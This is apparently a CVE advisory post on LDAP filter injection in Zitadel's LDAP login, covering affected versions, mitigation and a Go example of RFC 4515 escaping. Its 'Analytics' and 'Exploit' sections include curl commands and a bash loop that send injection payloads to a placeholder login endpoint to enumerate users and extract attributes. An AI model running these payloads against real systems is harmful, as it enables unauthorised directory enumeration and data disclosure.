How the mentioned CVE works:
The vulnerability exists in Zitadel’s LDAP identity provider implementation, where user-supplied usernames are not escaped before being inserted into LDAP search filters. An unauthenticated attacker can inject LDAP filter metacharacters such as *, (, or ) during the login process. The application builds a filter string of the form “(uid={username})” without sanitizing the input. Sending a username like “)(uid=” turns the filter into “(uid=)(uid=)”, which changes its logical structure. The LDAP server evaluates the injected filter and returns different responses depending on whether a user exists or an attribute matches. This enables blind LDAP injection, where the attacker observes success/failure responses or error messages. Authentication bypass is not possible, but the attacker can enumerate valid usernames by testing filter conditions; for example, injecting “(cn=admin)” reveals whether that entry exists. Sensitive attribute values can also be extracted through boolean conditions combined with timing or response differences. The flaw affects versions 2.71.11-2.71.19, 3.1.0-3.4.9, and 4.0.0-4.14.0, including release candidates. The patch adds proper escaping and permission checks for email/phone self-management.
dailycve form:
Platform: Zitadel
Version: 2.71.11-4.14.0
Vulnerability: LDAP filter injection
Severity: Medium
Date: 2026-05-08
Prediction: Patch already released
Analytics under What Undercode Say:
Check if LDAP injection is possible (blind test)
curl -X POST https://target.zitadel/login/ldap \
-d "username=)(uid=&password=anything" \
-v 2>&1 | grep -iE "error|success"
Enumerate users using LDAP injection payloads
for user in admin alice bob; do
payload=")(uid=${user}"
response=$(curl -s -o /dev/null -w "%{http_code}" -d "username=${payload}" -d "password=x" https://target.zitadel/login/ldap)
[ "$response" -eq 200 ] && echo "User $user exists"
done
Extract attribute (e.g., mail) via boolean injection
payload=")([email protected]"
curl -d "username=${payload}" -d "password=x" https://target.zitadel/login/ldap
Exploit:
Send unauthenticated POST requests to the LDAP login endpoint with username containing `)(uid=` or `)(cn=admin` etc. Observe HTTP status codes or error messages that differ between valid and invalid entries. Use binary search on character sets to retrieve full LDAP attributes (blind injection).
Protection from this CVE:
Upgrade to a patched version (2.71.20+, 3.4.10+, 4.14.1+). If upgrading is not possible, enforce strict LDAP access controls and disable anonymous binds. Sanitize all user input by escaping `* ( ) \ NUL` before inserting it into LDAP filters. Use parameterized LDAP queries or a library escaping helper (e.g., `ldap.EscapeFilter()` in Go) rather than hand-built filter strings.
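The following Go example, added here and not taken from Zitadel or the go-ldap project, shows the flawed filter construction described above next to the escaped form that the mitigation calls for. It implements the RFC 4515 escaping of `* ( ) \ NUL` as backslash-hex sequences (the same treatment `ldap.EscapeFilter()` applies), so it runs with the standard library alone; the function names `escapeFilterValue`, `vulnerableFilter`, `safeFilter` and `rawParenCount` are this example's own, and the sample username is constructed from the injection string quoted in the post.

```go
package main

import (
	"fmt"
	"strings"
)

// escapeFilterValue escapes the RFC 4515 LDAP filter metacharacters
// (* ( ) \ and NUL) as backslash-hex sequences. Added example, not
// Zitadel's code; go-ldap's ldap.EscapeFilter performs the same job.
func escapeFilterValue(s string) string {
	var b strings.Builder
	for i := 0; i < len(s); i++ {
		c := s[i]
		switch c {
		case '*', '(', ')', '\\', 0:
			fmt.Fprintf(&b, "\\%02x", c)
		default:
			b.WriteByte(c)
		}
	}
	return b.String()
}

// vulnerableFilter reproduces the flawed construction the post describes:
// the raw username is spliced straight into "(uid={username})".
func vulnerableFilter(username string) string {
	return "(uid=" + username + ")"
}

// safeFilter escapes the value first, so attacker-controlled input is only
// ever compared as data and can never close or open a filter component.
func safeFilter(username string) string {
	return "(uid=" + escapeFilterValue(username) + ")"
}

// rawParenCount counts literal '(' characters in a filter. A single equality
// filter built from one username must contain exactly one; more than one
// means the input changed the filter's logical structure. Escaped values
// contain no literal '(' at all, so the count stays 1 after escaping.
func rawParenCount(filter string) int {
	return strings.Count(filter, "(")
}

func main() {
	// Constructed sample input: the injection string quoted in the post.
	injected := ")(uid="
	for _, f := range []string{vulnerableFilter(injected), safeFilter(injected)} {
		fmt.Printf("%-22s components=%d\n", f, rawParenCount(f))
	}
}
```

Running it prints the vulnerable filter `(uid=)(uid=)` with two components and the escaped filter `(uid=\29\28uid=)` with one; the escaped form is what the directory server receives after the fix, and the parenthesis count is a cheap regression check to keep in a unit test for any code path that still concatenates user input into a filter.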
Impact:
Information disclosure allowing enumeration of valid usernames and extraction of sensitive LDAP attributes (e.g., email, department, employee IDs). No authentication bypass. Attacker can map internal directory structure for further attacks.
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

